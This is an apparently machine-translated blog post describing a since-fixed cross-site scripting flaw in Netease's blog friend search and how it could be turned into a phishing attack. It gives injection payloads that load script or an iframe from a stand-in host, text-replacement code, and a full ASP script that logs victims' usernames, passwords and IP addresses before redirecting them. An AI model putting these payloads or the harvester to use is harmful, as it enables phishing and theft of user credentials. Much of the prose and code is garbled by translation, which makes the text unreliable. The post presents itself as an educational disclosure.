Crisis behind Netease url

Author: cnryan @ http://hi.baidu.com/cnryan
(// This title party is really ...!!!)

An xss of 163 has been repaired. Fortunately, some images were cut at that time.
The discoverer of the Bug isXeyeOfMonyerIn the "find friends" section of Netease blog, enter the test code in the browser:
Http://blog.163.com/findFriend.do? Index = 1 & ageFrom = 18 & ageTo = 25 & gender = & province = monyer, xss: function () {alert (monyer) ;}(), xss2: & selfPage = t

In fact, URLs like General xss do not pose much threat to common websites. However, the evaluation of XSS depends on the entire environment, this XSS is meaningless. However, this is a cross-site approach of Netease.

Suppose there is a malicious user (not me) who uses 163 of the bug to launch a "phishing attack". That's terrible!

Implementation process:

Function () {var % 20 s = document. createElement (script); s. src = http://www.xxx.com/xss.js;document.body.appendChild (s );}

163 double quotation marks are filtered, but single quotation marks are ignored,
As a result, attacker can directly inject remote JavaScript code.

You can also directly construct a framework for phishing.
Function () {var s = document. createElement (iframe); s. src = http://www.xxx.com/xss.htm;document.body.appendChild (s );}

When accessingHttp://blog.163.com...Domain is embedded in xss.htm at the same time,
Xss.htm is a normal user login page and a locally saved login page, like this

The address modified in the xss.htm request is constructed as follows:

-------------------------------------------------------
<%
Dim getuser
Dim getpass
Dim mytime
Dim str

Getuser = Request ("user ")
Getpass = Request ("password ")
Getip = Request. ServerVariables ("REMOTE_ADDR ")
Mytime = now ()
Set fs = server. CreateObject ("Scripting. FileSystemObject ")
Set file = fs. OpenTextFile (server. MapPath ("msg.txt"), 8, True)

Str = "<-bof |" & mytime & "|" & getip & "| -------- user:" & getuser & "& password: "& getpass &" --------- | eof->"

File. writeline (str)
File. close
Set file = nothing
Set fs = nothing

Response. write "<script> window. location = http://www.163.com </script>"
Response. end
%>
-------------------------------------------------------

If some users do not have security awareness, log on to the modified page, and immediately turn back to a normal page for searching friends after collecting the account password in the form, this process is very confidential.

This iframe cannot achieve the "full screen" D effect, but it can be adjusted. In addition, use innerText to modify the search return information.

Function () {document. getElementById (friendList). innerText = cnryan coming ;}

URL after the Chinese needs through encoding, Netease is according to the UTF-8 to send Chinese, if the display content is changed to "Please log on to use ".
"% E8 % AF % B7 % E7 % 99% BB % E9 % 99% 86% E5 % 90% 8E % E4 % BD % BF % E7 % 94% A8"

Complete demo:
Http://blog.163.com/findFriend.do? Index = 1 & ageFrom = 18 & ageTo = 25 & gender = & province = monyer, xss: function () {document. getElementById (friendList ). innerText = % E8 % AF % B7 % E7 % 99% BB % E9 % 99% 86% E5 % 90% 8E % E4 % BD % BF % E7 % 94% A8; var % 20 s = document. createElement (iframe); s. src = http://www.baidu.com; s. height = 600; s. width = 1000; document. body. appendChild (s) ;}(), xss2: & selfPage = t

　

Finally, let's look at the phishing trap.

I believe this threat is huge!
When you are browsing your friend's blog happily, you suddenly receive such an email, and many people will click it without thinking. In this way, all evil will begin, on the "friend search" page, you will be prompted to log on to the system for use. The next step is to see if you will enter the trap. I believe most users with network security awareness will not be easily recruited.

But you must know that the fishermen are evil ones.

For Netease users, the number of users is measured in 1%. Assume that only of these users are visiting these anonymous emails (of course, you can also be fooled ); then, only 1% of users access the address. In the end, only 1% of users actually log on, and the number of affected users is huge.

---------------------------------------------------------

Netease Anti-xss filters are very powerful.
Today, I tested the XSS OF THE Netease blog module and found that it has been fixed.

Statement:
The above examples are for educational purposes only
Please do not use any of the above Code, technology or means to do illegal things. I am not responsible for anything else. Please return to the Chinese Internet world for cleanup.

It's all done!